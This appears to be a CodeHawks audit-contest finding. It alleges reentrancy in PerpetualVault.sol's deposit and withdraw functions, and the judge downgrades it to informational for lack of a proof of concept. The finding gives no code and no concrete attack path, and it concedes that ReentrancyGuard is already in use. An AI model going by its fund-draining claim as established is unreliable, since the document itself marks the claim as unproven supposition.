Reentrancy Vulnerability in PerpetualVault.sol
Summary
The PerpetualVault.sol contract is susceptible to reentrancy attacks during deposit and withdrawal operations. Although the contract uses ReentrancyGuard, there are potential gaps in its implementation, especially when interacting with external protocols like GMX or Paraswap.
Vulnerability Details
The deposit and withdraw functions in PerpetualVault.sol interact with external contracts (e.g., GMX, Paraswap) without ensuring that reentrancy is fully mitigated. For example, if a malicious contract is used as a token or if an external call fails, it could lead to reentrancy
Impact
An attacker could exploit this vulnerability to drain funds from the vault by repeatedly calling the deposit or withdraw function before the state is updated.
Tools Used
Slither (static analysis tool)
Manual code review
Recommendations
Add a nonReentrant modifier to all functions that interact with external contracts and ensure that state changes occur before external calls
Lead Judging Commences
Informational or Gas
Please read the CodeHawks documentation to know which submissions are valid. If you disagree, provide a coded PoC and explain the real likelihood and the detailed impact on the mainnet without any supposition (if, it could, etc) to prove your point.
Informational or Gas
Please read the CodeHawks documentation to know which submissions are valid. If you disagree, provide a coded PoC and explain the real likelihood and the detailed impact on the mainnet without any supposition (if, it could, etc) to prove your point.
Prize pool breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.